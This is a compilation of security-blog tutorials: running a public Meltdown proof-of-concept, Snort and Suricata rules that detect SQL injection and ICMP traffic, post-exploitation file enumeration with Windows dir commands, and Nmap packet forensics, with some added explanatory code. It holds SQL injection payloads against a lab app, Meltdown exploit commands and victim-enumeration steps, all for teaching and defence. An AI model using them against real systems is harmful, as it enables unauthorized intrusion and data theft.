Channel: Penetration Testing Archives - Hacking Articles

Check Meltdown Vulnerability in CPU


Hello Friends!! You must have heard of the latest vulnerability, “Meltdown”, which has been discovered in almost every CPU with an Intel processor; from this link you can check the list of vulnerable CPU descriptions. Today we are going to discuss how to “Check Meltdown vulnerability in any CPU” by using a script.

From Wikipedia

Meltdown is a hardware vulnerability affecting Intel x86 microprocessors and some ARM-based microprocessors. It allows a rogue process to read any physical, kernel or other process’s mapped memory, regardless of whether or not it should be able to do so. It allows an unauthorized process to read data from any address that is mapped to the current process’s memory space, because instruction pipelining in the affected processors means that the data from the unauthorized address will almost always be temporarily loaded into the CPU’s cache during speculative execution, from which it can be recovered using other techniques, even if the original read instruction eventually fails due to privilege checking and never produces a readable result. Since many operating systems map physical memory, kernel processes, and other running user space processes into the address space of every process and rely on privilege checking to prevent unauthorized access, Meltdown effectively allows a rogue process to read any physical, kernel or other process’s mapped memory, regardless of whether or not it should be able to do so. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM based processors (mobile devices, smart TVs and others), including a wide range of networking equipment.

Let’s start!!

Open the terminal and type the command given below to download the script from GitHub. It can only dump linux_proc_banner, which works as an interface for internal data structures in the kernel and is used to get information about the system and to change certain kernel settings.

git clone https://github.com/paboldin/meltdown-exploit.git

From the image given below you can observe that I had successfully downloaded this script on my Linux machine.

Now explore the downloaded folder in the terminal and run the command “make” to compile the program before running the script.

Now run the script by executing the command given below, which will identify the vulnerability state by reading its memory space.

./run.sh

From the image given below you can observe that, where it reports vulnerable ON, it has dumped the complete details of the CPU processor. It shows details such as:

Vendor ID: the Vendor ID (VID) is a unique number assigned to a piece of hardware to identify it on the system where it is installed.

CPU family: processors with the same functionality are categorised into the same family; here CPU family 6 indicates a model from the Pentium Pro family.

Model: indicates the model number within the CPU family.

Model name: holds the model name of the processor.

Stepping: used to identify the revision of the microprocessor.

Microcode: the lowest-level instruction set, stored permanently, that controls the microprocessor.

CPU MHz: describes the CPU's usage.

Cache size: defines the size of the cache memory.

You can also verify the above result by executing the command given below, which is used to obtain details of system information.
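As an added example (not part of the original post and not code from the paboldin/meltdown-exploit repository), the script below reads the same /proc/cpuinfo fields the article walks through and combines them with the kernel's own Meltdown verdict. It assumes a Linux host: the kernel lists `cpu_meltdown` in the `bugs` line of /proc/cpuinfo on affected CPUs, and kernels from 4.15 onward publish a verdict in /sys/devices/system/cpu/vulnerabilities/meltdown (`Not affected`, `Vulnerable`, or `Mitigation: ...`). The cpuinfo excerpt embedded in the code is constructed so the parser can be exercised offline.

```python
import os

# Constructed /proc/cpuinfo excerpt (one core) in the kernel's format; not output from the article's machine.
SAMPLE_CPUINFO = """\
processor\t: 0
vendor_id\t: GenuineIntel
cpu family\t: 6
model\t\t: 142
model name\t: Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
stepping\t: 9
microcode\t: 0x84
cpu MHz\t\t: 2711.999
cache size\t: 3072 KB
bugs\t\t: cpu_meltdown spectre_v1 spectre_v2

processor\t: 1
vendor_id\t: GenuineIntel
"""

# The fields the article walks through, plus the kernel's own 'bugs' flag line.
FIELDS = ("vendor_id", "cpu family", "model", "model name", "stepping", "microcode", "cpu MHz", "cache size", "bugs")
SYSFS_MELTDOWN = "/sys/devices/system/cpu/vulnerabilities/meltdown"   # kernel verdict, present on 4.15+ kernels

def parse_cpuinfo(text):
    """Fields of the first processor block; later cores repeat the same identification data."""
    info = {}
    for line in text.splitlines():
        if not line.strip():
            break                      # a blank line ends the first processor block
        key, _, value = line.partition(":")
        if key.strip() in FIELDS:
            info[key.strip()] = value.strip()
    return info

def assess(info, sysfs_verdict=None):
    """Combine the cpuinfo 'bugs' flag with the sysfs verdict into one status string."""
    flagged = "cpu_meltdown" in info.get("bugs", "").split()
    if sysfs_verdict is None:
        return "flagged, mitigation unknown" if flagged else "not flagged"
    if sysfs_verdict.startswith("Mitigation:"):
        return "mitigated"
    if sysfs_verdict.startswith("Vulnerable"):
        return "vulnerable"
    return "not affected"

def check_live():
    """Read the real files on a Linux host; returns None when they are unavailable."""
    try:
        with open("/proc/cpuinfo") as fh:
            info = parse_cpuinfo(fh.read())
    except OSError:
        return None
    verdict = None
    if os.path.exists(SYSFS_MELTDOWN):
        with open(SYSFS_MELTDOWN) as fh:
            verdict = fh.read().strip()
    return info, assess(info, verdict)

if __name__ == "__main__":
    sample = parse_cpuinfo(SAMPLE_CPUINFO)
    for field in FIELDS:
        print(f"{field:>10}: {sample.get(field, '-')}")
    print("sample status:", assess(sample, "Mitigation: PTI"))
    print("this host:", check_live())
```

The sysfs verdict is the one to trust on patched systems: a CPU can still carry the `cpu_meltdown` flag while the kernel reports `Mitigation: PTI`, which means page-table isolation is active and the proof-of-concept script above will no longer read kernel memory.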

Source: https://github.com/paboldin/meltdown-exploit

The post Check Meltdown Vulnerability in CPU appeared first on Hacking Articles.


Detect SQL Injection Attack using Snort IDS


Hello friends!! Today we are going to discuss how to “Detect SQL injection attack” using Snort, but before moving ahead kindly read both of our previous articles on Snort installation (manually or using the apt repository) and its rule configuration to enable it as an IDS for your network.

Basically, in this tutorial we are using Snort to capture the network traffic and analyse the SQL injection quotes injected into a web page to obtain information about the database system of a web server. Snort will generate an alert for malicious traffic when it catches such traffic on its network, and network administrators will immediately be alerted to the suspicious traffic and can take effective action against the attacking IP.

Requirement

IDS: Snort (Ubuntu)

Web application: Dhakkan

You can configure your own web server with the help of our article “Configure Web server for penetration testing”.

Let’s Begin!!

Identify Error Based SQL Injection

As we know, in error-based SQL injection the attacker uses single quotes (') or double quotes (") to break the SQL query in order to identify the vulnerability. Therefore be smart and add a rule in Snort which will analyse error-based SQL injection on the server when someone tries to execute an SQL query on your network for unprivileged access to the database.

Execute the command given below in Ubuntu's terminal to open the Snort local rule file in a text editor.

sudo gedit /etc/snort/rules/local.rules

Now add the lines given below, which will capture the incoming traffic arriving at any network IP via port 80.

alert tcp any any -> any 80 (msg:"Error Based SQL Injection"; content:"%27"; sid:100000011;)

alert tcp any any -> any 80 (msg:"Error Based SQL Injection"; content:"%22"; sid:100000012;)

If you read the above rules you can notice that I had applied a filter for the content “%27” and “%22”, which are the URL-encoded forms used by the browser for the single quote (') and double quote (") respectively when the URL is executed.

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now test your above rule by making an error-based SQL injection attack on the web application “Dhakkan”; therefore open the server IP in the web browser and use a single quote (') to identify the SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-1/?id=1'

For more detail on Error Based SQL injection read our previous article.

Now when the attacker executes malicious quotes in the browser to test for error-based SQL injection, the IDS of the network should capture this content and generate the alert.

As per our prediction, from the given image you can observe that Snort has generated an alert for error-based SQL injection on capturing the malicious quotes.

So when the network admin gets an alert from the IDS, on the basis of it he can take action against the attacking IP; as shown in the given image, the malicious traffic is coming from 192.168.1.21 on port 80.

Testing Double Quotes Injection

Now again open the server IP in the web browser and use a double quote (") to identify the SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-4/?id=1"

Now when the attacker executes malicious quotes in the browser to test for double-quote SQL injection, the IDS of the network should capture this content and generate the alert.

From the given image you can observe that Snort has generated an alert for error-based SQL injection on capturing the malicious quotes.

So when the network admin gets an alert from the IDS, on the basis of it he can take action against the attacking IP; as shown in the given image, the malicious traffic is coming from 192.168.1.21 on port 80.

Boolean Based SQL Injection

As we know, in Boolean-based SQL injection the attacker uses AND/OR operators to confirm whether the database is vulnerable to Boolean SQL injection by evaluating the results of various queries which return either TRUE or FALSE.

Now add a rule in Snort which will analyse Boolean-based SQL injection on the server when someone tries to execute an SQL query on your network for unprivileged access to the database. Here I had applied a filter for the content “and” & “or” to be captured. Here nocase denotes not case sensitive, so it matches AND/and and OR/or.

alert tcp any any -> any 80 (msg:"AND SQL Injection"; content:"and"; nocase; sid:100000060;)

alert tcp any any -> any 80 (msg:"OR SQL Injection"; content:"or"; nocase; sid:100000061;)

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again open the server IP in the web browser and use the AND operator to identify the Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-8/?id=1' AND 1=1 --+

For more detail on Boolean Based SQL injection read our previous article.

Now when the attacker executes the malicious query in the browser to test for Boolean-based SQL injection, the IDS of the network should capture this content and generate the alert.

As per our calculation, from the given image you can observe that Snort has generated an alert for Boolean-based SQL injection on capturing the content AND.

So when the network admin gets an alert from the IDS, on the basis of it he can take action against the attacking IP; as shown in the given image, the malicious traffic is coming from 192.168.1.21 on port 80.

Testing OR Operator

Again open the server IP in the web browser and use the OR operator to identify the Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-8/?id=1' OR 1=1 --+

Now when the attacker executes the malicious query in the browser to test for Boolean-based SQL injection, the IDS of the network should capture this content and generate the alert.

As per our calculation, from the given image you can observe that Snort has generated an alert for Boolean-based SQL injection on capturing the content OR.

So when the network admin gets an alert from the IDS, on the basis of it he can take action against the attacking IP; as shown in the given image, the malicious traffic is coming from 192.168.1.21 on port 80.

Encoded AND/OR

Similarly, in the rules given below I had applied a filter for the content “%26%26” and “%7c%7c”, which are the URL-encoded forms used by the browser for && and || respectively when the URL is executed.

alert tcp any any -> any 80 (msg:"AND SQL Injection"; content:"%26%26"; nocase; sid:100000008;)

alert tcp any any -> any 80 (msg:"OR SQL Injection"; content:"%7c%7c"; nocase; sid:100000009;)

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again open the server IP in the web browser and use the && operator to identify the Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-25/?id=1' %26%26 1==1 --+

For more details read our previous article

Now when the attacker executes the malicious query in the browser to test for Boolean-based SQL injection, the IDS of the network should capture this content and generate the alert.

As per our calculation, from the given image you can observe that Snort has generated an alert for Boolean-based SQL injection on capturing the content %26%26.

So when the network admin gets an alert from the IDS, on the basis of it he can take action against the attacking IP; as shown in the given image, the malicious traffic is coming from 192.168.1.21 on port 80.

Testing Encoded OR Operator

Again open the server IP in the web browser and use the || operator to identify the Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-25/?id=1' %7C%7C 1==1 --+

Now when the attacker executes the malicious query in the browser to test for Boolean-based SQL injection, the IDS of the network should capture this content and generate the alert.

As per our calculation, from the given image you can observe that Snort has generated an alert for Boolean-based SQL injection on capturing the content %7C%7C.

So when the network admin gets an alert from the IDS, on the basis of it he can take action against the attacking IP; as shown in the given image, the malicious traffic is coming from 192.168.1.21 on port 80.

Identify Form Based SQL Injection

Form-based SQL injection is also known as “POST error-based SQL injection”, because the attacker executes malicious quotes inside the login form of a web page that contains text fields for the username and password used to log in to the web server.

Therefore now add a rule in Snort which will analyse form-based SQL injection on the server when someone tries to execute an SQL query on your network for unprivileged access to the database.

alert tcp any any -> any 80 (msg:"Form Based SQL Injection"; content:"%27"; sid:1000003;)

If you read the above rule you can notice that I had applied a filter for the content “%27” to be captured; turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

I had used a single quote (') to break the query inside the username text field, then clicked on submit.

Username: '

From the given screenshot you can see that we have got an error message (in blue), which means the database is vulnerable to SQL injection.

For more detail on form-based SQL injection read our previous article.

Now when the attacker executes malicious quotes in the browser to test for form-based SQL injection, the IDS of the network should capture this content and generate the alert.

As per our prediction, from the given image you can observe that Snort has generated an alert for form-based SQL injection on capturing the malicious quotes.

So when the network admin gets an alert from the IDS, on the basis of it he can take action against the attacking IP; as shown in the given image, the malicious traffic is coming from 192.168.1.21 on port 80.

Identify Order by SQL Injection

In order to identify the number of columns in the database, the untrusted user may use the ORDER BY clause, which arranges the result set in ascending or descending order of the columns used in the query.

Now add a rule in Snort which will analyse ORDER BY SQL injection on the server when someone tries to execute an SQL query on your network for unprivileged access to the database. Here again I had applied a filter for the content “order” to be captured.

alert tcp any any -> any 80 (msg:"Order by SQL Injection"; content:"order"; sid:1000005;)

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now again open the server IP in the web browser and use the string order by to identify the columns of the database as shown below.

192.168.1.20/sqli/Less-1/?id=1' order by 1,2,3 --+

Now when the attacker executes the malicious string in the browser to test for ORDER BY SQL injection, the IDS of the network should capture this content and generate the alert.

As per our prediction, from the given image you can observe that Snort has generated an alert for ORDER BY SQL injection on capturing the malicious string.

So when the network admin gets an alert from the IDS, on the basis of it he can take action against the attacking IP; as shown in the given image, the malicious traffic is coming from 192.168.1.21 on port 80.

Identify Union Based SQL Injection

We all know that in error-based SQL injection the attacker may use the UNION operator to combine the result sets of two or more SELECT statements. Therefore add a rule in Snort which will analyse UNION SELECT SQL injection on the server when someone tries to execute an SQL query on your network for unprivileged access to the database. Here again I had applied a filter for the content “union” to be captured.

alert tcp any any -> any 80 (msg:"UNION SELECT SQL Injection"; content:"union"; sid:1000006;)

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now again open the server IP in the web browser and use the string union select to read data from the database as shown below.

192.168.1.20/sqli/Less-1/?id=-1' union select 1,2,3 --+

Now when the attacker executes the malicious string in the browser to test for UNION SELECT SQL injection, the IDS of the network should capture this content and generate the alert.

As per our prediction, from the given image you can observe that Snort has generated an alert for UNION SELECT SQL injection on capturing the malicious string.

So when the network admin gets an alert from the IDS, on the basis of it he can take action against the attacking IP; as shown in the given image, the malicious traffic is coming from 192.168.1.21 on port 80.
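As an added example (not part of the original post and not Snort's own matching engine), the script below replays the content matches from every rule in this article, from the error-based %27/%22 rules through the Boolean AND/OR, encoded &&/||, ORDER BY and UNION SELECT rules, over constructed HTTP requests. It shows what a bare `content` match really is: a substring test over the whole payload, so the `and`/`or`/`order` rules also fire on a harmless request whose parameter names happen to contain those letters. The `refined_alert` function is my own tighter check, not from the article: it URL-decodes the request target first and only fires when a quote character precedes the operator or keyword. The sample requests and the 192.168.1.20 host are constructed from the article's test URLs.

```python
import re
from urllib.parse import unquote

# Content matches taken from the article's local.rules: (msg, content, nocase, sid).
RULES = [
    ("Error Based SQL Injection", "%27", False, 100000011),
    ("Error Based SQL Injection", "%22", False, 100000012),
    ("AND SQL Injection", "and", True, 100000060),
    ("OR SQL Injection", "or", True, 100000061),
    ("AND SQL Injection", "%26%26", True, 100000008),
    ("OR SQL Injection", "%7c%7c", True, 100000009),
    ("Order by SQL Injection", "order", False, 1000005),
    ("UNION SELECT SQL Injection", "union", False, 1000006),
]

def content_matches(payload, content, nocase):
    """Snort's bare content keyword is a raw substring test over the packet payload."""
    return content.lower() in payload.lower() if nocase else content in payload

def match_rules(payload):
    """Sids of every article rule that would fire on this request payload, in rule order."""
    return [sid for _msg, content, nocase, sid in RULES if content_matches(payload, content, nocase)]

# Tighter variant (my own, not from the article): decode the URL first and require a quote
# character directly before the operator or keyword, so ordinary words no longer trigger it.
SQLI_KEYWORD = re.compile(r"""['"]\s*(?:\|\||&&|(?:and|or|order\s+by|union\s+select)\b)""", re.IGNORECASE)

def refined_alert(request):
    """True when the decoded request target carries a quote followed by an SQL operator/keyword."""
    target = request.split(" ", 2)[1] if request.startswith(("GET ", "POST ")) else request
    decoded = unquote(target.replace("+", " "))
    return bool(SQLI_KEYWORD.search(decoded))

# Constructed HTTP requests (not captures from the article's lab): two built from the article's
# test URLs and one benign shop request whose parameter names merely contain "and", "or", "order".
ATTACK_AND = "GET /sqli/Less-8/?id=1%27%20AND%201=1%20--+ HTTP/1.1\r\nHost: 192.168.1.20\r\n\r\n"
ATTACK_ENCODED = "GET /sqli/Less-25/?id=1%27%20%26%26%201=1%20--+ HTTP/1.1\r\nHost: 192.168.1.20\r\n\r\n"
BENIGN = "GET /shop?category=android&sort=order_date HTTP/1.1\r\nHost: 192.168.1.20\r\n\r\n"

if __name__ == "__main__":
    for name, req in [("attack", ATTACK_AND), ("encoded", ATTACK_ENCODED), ("benign", BENIGN)]:
        print(name, "article rules fired:", match_rules(req), "refined:", refined_alert(req))
```

The benign request trips three of the article's rules while the refined check stays quiet, which is the trade-off to keep in mind when tuning these signatures on a real network: the two-letter `or` match in particular will fire on a large share of ordinary web traffic, so in production the same idea is normally expressed with Snort's HTTP-aware and regex rule options rather than a bare content match.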

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here


How to Configure Suricata IDS in Ubuntu


Suricata is developed by the Open Information Security Foundation. Suricata is a high performance Network IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF and its supporting vendors.

Features

IDS / IPS

Suricata implements a complete signature language to match on known threats, policy violations and malicious behaviour. Suricata will also detect many anomalies in the traffic it inspects. Suricata is capable of using the specialized Emerging Threats Suricata ruleset and the VRT ruleset.

High Performance

A single Suricata instance is capable of inspecting multi-gigabit traffic. The engine is built around a multi threaded, modern, clean and highly scalable code base. There is native support for hardware acceleration from several vendors and through PF_RING and AF_PACKET.

Automatic protocol detection

Suricata will automatically detect protocols such as HTTP on any port and apply the proper detection and logging logic. This greatly helps with finding malware and CnC channels.

NSM: More than an IDS

Suricata can log HTTP requests, log and store TLS certificates, extract files from flows and store them to disk. The full pcap capture support allows easy analysis. All this makes Suricata a powerful engine for your Network Security Monitoring (NSM) ecosystem.

From: https://suricata-ids.org/

Lets Begin!!

We had chosen the Ubuntu operating system for the installation and configuration of Suricata. Before installing Suricata on your machine, you need to install the necessary Ubuntu dependencies. Therefore open the terminal and type the command given below to install the prerequisites by running an update.

apt-get update

This is the easiest way to install and configure Suricata on your system, because all of its requirements, whether the Suricata rules directory or the logging directory, are provided as packages from the apt repository. Enter the command given below to begin the Suricata installation.

apt-get install suricata -y

Now we need to create an empty text file for our local rules inside the Suricata rules folder.

touch /etc/suricata/rules/local.rules

After that, open the configuration file using gedit to make some changes inside it.

gedit /etc/suricata/suricata-debian.yaml

The two most important steps we need to perform here are:

  1. Comment out all the other available rule files so that only your local rule file takes priority.
  2. Mention local.rules under the rule-files list.

Now add the network CIDR for which the IDS will filter the incoming and outgoing traffic, as shown in the image given below.

Here we had set HOME_NET to 192.168.1.0/24.

Now open the local rule file to add your own network filtering rules inside it.

gedit /etc/suricata/rules/local.rules

Now if you are not very familiar with its rule configuration, you need not worry, because implementing a rule in Suricata is very similar to Snort. For help, open this Link to get details of IDS rule implementation.

alert icmp any any -> 192.168.1.111 any (msg:"ICMP detected"; sid:10000001;)

The above rule will generate an alert when it finds any network IP sending ICMP packets on our network by pinging the IP 192.168.1.111.

Now execute the following command to disable GRO (Generic Receive Offload) on the specific interface with the help of ethtool.

ethtool -K ens33 gro off

Then turn on the NIDS mode of Suricata using the command given below.

suricata -c /etc/suricata/suricata-debian.yaml -i ens33

Now let's ping the IP 192.168.1.111 from another system to test whether our NIDS generates an alert for the ICMP packets or not. From the given image you can read the command ping 192.168.1.111, where you can observe that it has sent 3 ICMP request packets.

Basically, Suricata alert logs are generated under /var/log/suricata, and you can use the command given below to read the captured alerts (fast.log is Suricata's default alert log file).

tail -f /var/log/suricata/fast.log

As a result, Suricata in NIDS mode had captured only 3 ICMP packets from IP 192.168.1.102, which you can observe from the image given below that generated the alert “ICMP Detected”. This happens because in the above rule we had applied the “->” one-directional operator, which means it will only capture traffic going from the source IP to the destination IP.

Here you can perceive that the two ICMP packets shown are coming from 192.168.1.102 to 192.168.1.111, which means it has only captured the ICMP echo-request packets from the source IP.
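As an added example (not part of the original post and not code from the Suricata project), the script below parses alert lines in Suricata's default fast.log format and evaluates the article's rule header against packets in both directions, which makes the "->" behaviour described above visible: echo requests from 192.168.1.102 to 192.168.1.111 match, the echo replies travelling the other way do not, and "<>" would match both. The log lines are constructed in the fast.log layout, not copied from the article's screenshot; the addresses are the ones the article uses.

```python
import ipaddress
import re
from collections import Counter

# Constructed fast.log lines in Suricata's default alert format; not the article's own output.
SAMPLE_FAST_LOG = """\
01/28/2018-10:15:02.118201  [**] [1:10000001:0] ICMP detected [**] [Classification: (null)] [Priority: 3] {ICMP} 192.168.1.102:8 -> 192.168.1.111:0
01/28/2018-10:15:03.120455  [**] [1:10000001:0] ICMP detected [**] [Classification: (null)] [Priority: 3] {ICMP} 192.168.1.102:8 -> 192.168.1.111:0
01/28/2018-10:15:04.122873  [**] [1:10000001:0] ICMP detected [**] [Classification: (null)] [Priority: 3] {ICMP} 192.168.1.102:8 -> 192.168.1.111:0
"""

FAST_LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.+?)\s+\[\*\*\]"
    r".*?\{(?P<proto>[^}]+)\}\s+(?P<src>[^\s:]+):(?P<sport>\d+)\s+->\s+(?P<dst>[^\s:]+):(?P<dport>\d+)\s*$"
)

def parse_fast_log(text):
    """One dict per well-formed alert line; malformed lines are skipped rather than crashing the parser."""
    return [m.groupdict() for m in map(FAST_LOG_RE.match, text.splitlines()) if m]

def flows(alerts):
    """Alert counts keyed by (sid, protocol, 'src -> dst') so the direction is visible at a glance."""
    return Counter((a["sid"], a["proto"], f'{a["src"]} -> {a["dst"]}') for a in alerts)

def header_matches(rule, proto, src, dst):
    """Evaluate a rule header such as ('icmp', 'any', '->', '192.168.1.111') against one packet."""
    rule_proto, rule_src, direction, rule_dst = rule

    def in_spec(addr, spec):
        return spec == "any" or ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)

    if proto.lower() != rule_proto:
        return False
    forward = in_spec(src, rule_src) and in_spec(dst, rule_dst)
    reverse = in_spec(dst, rule_src) and in_spec(src, rule_dst)
    return forward or (direction == "<>" and reverse)   # '->' is one-directional, '<>' matches both ways

ICMP_RULE = ("icmp", "any", "->", "192.168.1.111")   # header of the article's local.rules entry

if __name__ == "__main__":
    for key, count in flows(parse_fast_log(SAMPLE_FAST_LOG)).items():
        print(count, "alerts for sid", key[0], key[1], key[2])
    print("echo request matches:", header_matches(ICMP_RULE, "ICMP", "192.168.1.102", "192.168.1.111"))
    print("echo reply matches:  ", header_matches(ICMP_RULE, "ICMP", "192.168.1.111", "192.168.1.102"))
```

Grouping alerts by source and destination the way `flows` does is also a quick way to confirm, after a change to HOME_NET or the rule direction, that the IDS is seeing the traffic you expect and nothing else.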

Author: Mohit Chauhan is a technical writer at hacking articles and cyber security enthusiast. Contact Here


Post Exploitation in Windows using dir Command


In this article you will learn how to use the Windows command line command “dir” to extract files, get information about the number of files of a particular extension and much more, using the Metasploit framework.

dir Command: It displays a list of a directory’s files and subdirectories.

Syntax

dir [<Drive>:] [<Path>] [<FileName>] [/p] [/q] [/a [[:] <Attributes>]] [/s] [/b]

[/p]: Displays one screen of the listing at a time.

[/q]: Displays file ownership information.

[/s]: Lists every occurrence of the specified file name within the specified directory and all subdirectories.

[/b]: Displays a bare list of directories and files, with no additional information.

[/a]: Attributes (Additional Options).

It is usually attached with options such as

[/ad]:  Directories

[/ah]:  Hidden files

[/as]:  System files

[/a-attribute]: Not (It is used when opposite of the attribute is to be obtained)

Now to use dir for Post Exploitation, we will need an Administrator Privileged shell, which can be found here.

Now we will use different combinations of the attributes and parameters to extract data from victim’s system.

Find Directories using a search string

Here, we are using the following options with the dir command:

[/b] to get a bare listing,

[/s] to search subdirectories as well,

[/ad] to get the list of directories,

containing the string *sales* in their name.

Syntax: dir /b /s /ad [directory]\*string*

Example:  dir /b /s /ad d:\*sales*

Find the Number of Files/Directories in a Directory

If we need the number of files, we have to add the find command by piping [|] it with dir.

Example: dir /b | find /c /v ""

Here [/b] gets a bare listing, the [/c] switch tells the find tool to count how many lines contain your search term, and the [/v] switch shows any lines that do not contain the string you have specified, in this case "". As a file name cannot be empty (""), it will count all the file names.

The above command returns the number of files in the directory you are currently in. In my case it returns 22, which means the victim has 22 files in his D:\ directory.

Find the Number of files

Here we are using:

Example: dir /b /s /a-d d:\*sales* | find /c /v ""

[/ad] is for directories.

[-] is used as NOT, so [/a-d] is for not-directories, i.e. files.

Also find /c /v "" is used to get the count. From the image given below you can observe that it found 5 files inside the sales folder.

Find the Number of Directories

Syntax: dir /b /s /ad [directory]\*string* | find /c /v ""

Example: dir /b /s /ad d:\*sales* | find /c /v ""

Here we need to get the number of directories named *sales*; it can be anything mentioned in *string*.

[/ad] is for directories.

Here find /c /v "" is used to get the count, and from the image given below you can observe that it found 5 subdirectories inside the sales folder.

Find Files of a Particular Extension

In the given example, I searched for .xlsx files which are MS-Excel Files, but we can use it for any extension file like pdf, png, exe, docs etc.

Syntax: dir /b /s [directory]\*extension*

Example: dir /b /s d:\*.xlsx*

From given below image you can read name of excel files inside D: drive.

Find the Number of Files of a particular Extension

If we add find /c /v "" we will get the number of files of a particular extension as shown below.

Example: dir /b /s d:\*.xlsx* | find /c /v ""

From the image given below you can observe that it found 4 Excel files inside the D: drive.

Find the Number of Hidden Files/Directories

To get hidden files we will use the attribute [/ah].

And when combined with find /c /v "", we will get the number of hidden files/directories in the given directory as shown below.

Syntax: dir /b /ah [directory] | find /c /v ""

Example: dir /b /ah d:\ | find /c /v ""

From the image given below you can observe that it found 3 hidden files inside the D: drive.

Find the Hidden Files/Directories in a Directory

To view the hidden files in the given directory we will use the attribute [/ah] with [/b] to get a bare listing of the hidden files.

Syntax: dir /b /ah [directory]

Example: dir /b /ah d:\

From the image given below you can read the names of the hidden files inside the D: drive.

Find the System Files Stored in a Directory

To get the system files we will use another attribute, [/as]; combined with [/b] it will give the names of the system files stored in the given directory.

Example: dir /b /as d:\

From the image given below you can read the names of the system files inside the D: drive.

Author: Pavandeep Singh is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India. Contact here

Forensic Investigation of Nmap Scan using Wireshark


Hello friends!! Today we are discussing how to read the hexadecimal bytes of an IP packet, which helps a network admin to identify various types of Nmap scanning. But before moving ahead please read both of our previous articles, “Network packet forensic” and “NMAP scanning with Wireshark”; they will help you understand this article better.

Requirement

Attacking tool: Nmap

Analysis tool: wireshark

We are going to calculate the hexadecimal bytes in Wireshark using the table given below. As we know, Wireshark captures network packets mainly at 4 layers, which are described in the table below as per the OSI layer model and the TCP/IP layer model.

Nmap ARP Scanning

Let’s  start!!

Hopefully the reader is aware of basic Nmap scanning techniques; if not, read about them here. Now open the terminal and execute the command given below, known as a “HOST SCAN”, to identify live hosts on the network.

nmap -sn 192.168.1.100

Nmap uses the -sP/-sn flag for host scans and broadcasts an ARP request packet to identify which IP is allocated to a particular host machine. From the image given below you can observe the “1 host up” message.

Working of ARP Scan for Live Host

  1. Send ARP request for MAC address
  2. Receive MAC address though ARP Reply packet

Steps to Identify Nmap ARP Scan

  • Collect Ethernet Header details

Here we used Wireshark to capture the network packets coming from the victim's network, and in order to analyse only ARP packets we applied the filter “ip.addr == VICTIM IP || arp” as shown in the image given below. Here you will find 2 ARP packets: basically the 1st ARP packet is a broadcast asking for the MAC address of that IP on the network, and the 2nd packet is a unicast containing the answer to the IP query.

Now let's read the hex value of the Ethernet header to identify the source and destination MAC addresses; along with that we can also enumerate the bytes used for the encapsulated packet, in order to identify which Ether type is being used here.

Hence from the Ethernet header we can conclude that it is an ARP broadcast packet asking for the destination MAC address. There shouldn't be any uncertainty about the source MAC address, which belongs to the sender of the packet, but for the destination MAC address we got ff:ff:ff:ff:ff:ff, which means the exact destination machine is not known here. Moving further ahead we found Ether type 0x0806, highlighted in yellow, which is used for the ARP protocol.

Collect ARP Header (Request/Reply)

In order to identify an ARP scan you need to investigate some important parameters which could help a network admin make a correct assumption about the ARP scan.

Try to collect following details as given below:

  • Opcode (Request/Reply)
  • Source Mac
  • Source IP
  • Destination MAC
  • Destination IP

Now with the help of the following table you can read the hex values highlighted in the images above and below for the ARP Request and Reply packets respectively.

Nmap ICMP Scanning

Now execute the command given below, known as a “HOST SCAN”, to identify live hosts on the network by sending a ping request with the help of ICMP packets.

nmap -sn 192.168.1.100 --disable-arp-ping

The above command will send an ICMP request packet instead of an ARP request to identify live hosts on the network.

Working of Nmap ICMP ping when the host is live:

  1. Send ICMP echo request packet.
  2. Receive ICMP echo reply.
  3. Send TCP SYN packet on a TCP port (one that is rarely blocked by the network admin).
  4. Receive TCP RST-ACK from the target's network.

As a result Nmap gives the “HOST UP” message as shown in the image given below.

Steps to Identify Nmap ICMP Scan

  • Collect IP Header Details for Protocol version

For reading the data of the Ethernet header, visit our previous article “Network packet forensic”.

NOTE: Ether type for IPv4 is 0x0800

Since we know ICMP is a Layer 3 protocol according to the OSI model, we need to focus on the following details for ICMP forensics with the help of the IP header of a packet.

Try to collect the following details as given below:

  1. IP header length 20 bytes (5 × 4 = 20 bytes)
  2. Protocol (01 for ICMP)
  3. Source IP
  4. Destination IP

From the image given below you can observe the hexadecimal information of the IP header fields, and using the given table you can study these values to obtain their original meaning.

The IP header length field is given as a count of 4-byte words; here it is 5, which is also the minimum IP header length, and to make it 20 bytes multiply 5 by 4, i.e. 5 * 4 bytes = 20 bytes.

Identify ICMP Message type  (Request /Reply)

As we discussed above, according to the Nmap ICMP scanning technique the 1st packet should be the ICMP echo request packet and the 2nd packet should be the ICMP echo reply packet.

Now with the help of the following table you can read the hex values highlighted in the images above and below for the ICMP Request and Reply packets respectively.

  • Identify TCP Flags

As discussed above, after the ICMP reply the 3rd packet should be a TCP-SYN packet and the 4th should be TCP-RST/ACK. We had seen in our previous article that the hex values of the TCP flags all differ from each other, so if we are talking about the TCP-SYN flag then its hex value should be 0x02.

From the table given below you can observe the sequence of TCP flags and how the bits of these flags are set when sending a packet to the destination port.

